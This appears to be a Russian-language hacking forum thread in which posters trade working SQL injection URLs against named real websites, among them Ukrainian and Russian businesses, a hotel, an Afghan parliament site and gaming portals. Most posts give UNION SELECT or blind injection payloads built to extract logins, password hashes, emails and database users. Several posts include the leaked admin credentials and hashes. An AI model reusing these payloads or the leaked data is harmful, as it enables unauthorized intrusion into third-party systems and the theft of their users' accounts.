http://www.flagman.kiev.ua/pub/view.php?pid=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10/*
Проститутки: Code: http://putana.nu/list.php?link=-35532+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,pass,0x3a,email),30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+3001,1-- Данные выводятся в анкетных данных слева, под тарифами.
2.acme в http://filefront.jino-net.ru/sql.html нету, искать по теме (которая разрослась на ~550 страниц) сидя на диалапе сложно . Опять же в антибояне нету:
Code: http://www.flagman.kiev.ua/pub/view.php?pid=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10/* 4.1.22/flagman/u_flagman@localhost
Сайт:www.bazarinfo.com Инфа: Газета объявлений SQL-Inj: Code: http://www.bazarinfo.com/view.php?page=1&id=-14+union+select+1,2,3,4,5,6,7,8,9/* --------------------------------------------------------------- Сайт: www.nationalassembly.af Инфа: Национальная асамблея Авганистана. SQL-Inj: Code: http://www.nationalassembly.af/index.php?id=99+union+select+version(),2,3,4,5,6,7,8-- Ну и так Скули на некоторых сайтах,небыло времени их раскрутить. HTML: http://www.script.com.ua/comments.php?s=news&id=115' http://www.g-models.com/foto.php?id=1'+order+by+1/*&i=6 http://www.desktopsidebar.com/ffdetails.php?id=161'+order+by+14/*
http://www.sticker.su/forum.php?sub_topics=true&main_topic_id=1'+union+select+concat_ws(0x3a,login,password,email),2,3,4+from+forum_users+limit+1,1/* Не наю, было это или нет,чел нашёл уязвимый сайт:Р.Ни могу понять,почему пишет,что количество столбцов левое, ибо ордер бай выдаёт 4 о_О.Таблицу и поля вручную подогнал.Мошь выведет кто о_О.
dailybeacon.utk.edu Code: http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12/**/from/**/mysql.user/* root:49c206e707168c98
Code: http://www.gamershood.com/game.php?id=769+and+1=2+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=21000--
Помогите с иньекцией ниче не получаеться http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
version: 4.0.24_Debian-10sarge1 bd: atrium user: root@localhost admin: login: admin pass_hash: 74aff5cad73b7d1b587fe5a4fe5288d8 mysql.user: 1. root 001c591f0180a0db 2. root 404a5bc542945739 3. sys 42317d1c50e8dbb6
Code: http://www.vlankas.ru/~bark/modules/myarticles/topics.php?op=listarticles&topic_id=-2%20union%20select%201,2,concat_ws(0x3a,uname,pass),4,5,6%20from%20runcms_users+limit+0,1 itman:bfc4c35ff54e5ff14f899eaf0b312d0c Code: http://www.cumaroua.net/index.php?option=com_jooget&Itemid=1&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/* admin:dc85333ba761e84fc1becd24397ba39e
краткий обзор багов гохи: 1) посимвольный брут с этого нс: Code: [B]http://wow.ru/c/pagecont/?id=2241+and+ascii(lower(substring(user(),4,1)))%3C=97[/B] Code: [B]1-103 g 2-111 o 3-104 h 4-97 a 5-95 _ 6-103 g 7-111 o 8-104 h 9-97 a 10-115 s 11-64 @ 12 49 1 ...[/B] 2)reverse-ip=> Code: [B]http://news.goha.ru/c/pagecont/?id=2217+order+by+4/*[/B] -//- 3)однако, есть и не посимвольный брут, причем где то ковычки фильтруются: Code: [B]http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+load_file('/lala'),2,3,4+from+information_schema.tables/*[/B] 4).. а где то нет: Code: [B]http://www.list.goha.ru/suggest-link.php?id=0'+union+select+1,load_file('/lala'),3,4,5,6,7,8,9,10,11,12,13,14,15/*[/B] или даже так (вывод в исходниках): Code: [B]http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+concat(0x3b,table_name,table_schema),2,3,4+from+information_schema.tables/*[/B] 6)причем бага с посимвольным брутом распостранена на нескольких ресурсах гохи: Code: [B]http://lineage2.ru/c/pagecont/?id=2761-1[/B] сколько акков с оффа можно увести, получив доступ к личкам пользователей - решать вам, и помните о неправомерном доступе к закрытой информации=).
Лично меня с лайнэйдж редиректит =) http://lineage2.ru/c/pagecont/?id=2760+and+substring(version(),1,1)=5 А вот:Р http://lineage2.ru/c/pagecont/?id=2760+or+2760=if(ascii((select+user()))>=254,1,0,benchmark(2999999,md5(now())) Если вместо 254 вписать 280 или больше всё равно возвращает 1,или запрос непральный,бес понятия) http://lineage2.ru/c/pagecont/?id=2760+order+by+4/* http://lineage2.ru/c/pagecont/?id=2760+union+select+1,2,3,4/* Фильтрация или запрос неверный) http://lineage2.ru/c/pagecont/?id=2760+union+select+0x277461626C655F6E616D6527,2,3,4+0x66726F6D+information_schema.tables/* Чойто не выходит: )
http://www.ufsa-tour.com.ua/news.php?news_id=-17+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),5,6/* 4.1.22-standard-log ufsacom_usrufsa3@localhost ufsacom_ufsa3 //************************************* Страховая компания ВЕСКО http://vesko.com.ua/news.php?news_ID=-328+union+select+1,2,user(),4,5,version()/* 4.1.22-log [email protected] news //************************************* http://www.bumexpress.com.ua/news.php?news_id=-122+union+select+1,2,user(),4,5,6,7,8,9,10,11/* 4.1.22 bumexpress@localhost bumexpress //************************************ http://kompan.altercon.com.ua/news.php?news=2&news_id=-3+union+select+1,user(),3,4,version(),6,database(),8/* 4.1.22-log altercon_det@viper altercon_det //************************************ Отель "РУСЬ" Киев http://www.hotelrus.kiev.ua/ru/information/news/news.php?news_id=-2+union+select+1,user(),3,version(),5,6,7/* 5.0.22-standard droopy_hotelrus@localhost droopy_hotelrus Блин в 12.00 вырубят инет кому надо держите http://www.master-stroy-yug.com.ua/news.php?news_id=22+order+by+1/* http://www.cpc.com.ua/rus/news.php?news_id=11+order+by+100/* не серчайте на меня за офтоп плиз Славная сегодня была охота
http://www.master-stroy-yug.com.ua/news.php?news_id=22+union+select+1,user(),version(),4,5,6/* админка тоже есть, но она походу пишет и взаимодействует с файлами а не базой.. 5 ветка. http://encycl.anthropology.ru/article.php?id=-1+union+select+1,user(),version(),database(),5,6,7,8,9,10/* 5 ветка http://www.mtas.ru/second.php?ID=-15+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* 5 ветка http://www.ciritas.ru/product.php?id=-2+union+select+1,2,3,4,version(),6,7,8,9/* fадминка по ходу дело с базой повязана 4 ветка http://www.clasp.org/publications.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15/* первая версия 4 ветки кажись, дальше крутить охоты нету.. http://www.fondationbrigittebardot.fr/site/homepage.php?Id=2+union+select+1/* фильтрация http://www.gregorypacks.com/prod.php?ID=-2+order+select+1/* здесь полная фильтрация.. Жесть http://www.eutrainingsite.com/open_details.php?id=2+group+by+55/* не столько терпелив.. Думаю кому-нить пригодиться .
Мелочевка. hadouken! user: uk_hadoukenUser@unity-apache2 db: uk_hadouken version: 4.0.14-Max-log panelmonkey.org user: [email protected] db: db113074304 version: 4.0.27-max-log bitdefenderthailand.com user: amphonet_priy@localhost db: amphonet_bitdefender version: 5.0.22 Code: http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(TABLE_NAME,0x2,COLUMN_NAME))),6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+where+COLUMN_NAME+like+'login'-- Code: http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id,0x2,company_name,0x2,address,0x2,company_phone,0x2,contact_person,0x2,password))),6,7,8,9,10+from+dealer--
Веломаг Code: http://veliki.ru/shop/show_cat.php?grid=-10%20union%20select%201,2,3,version(),5,6/* Code: http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,passwd),5,6/**/from/**/user/* Code: http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,password),5,6/**/from/**/admin/* ну а вот и админ
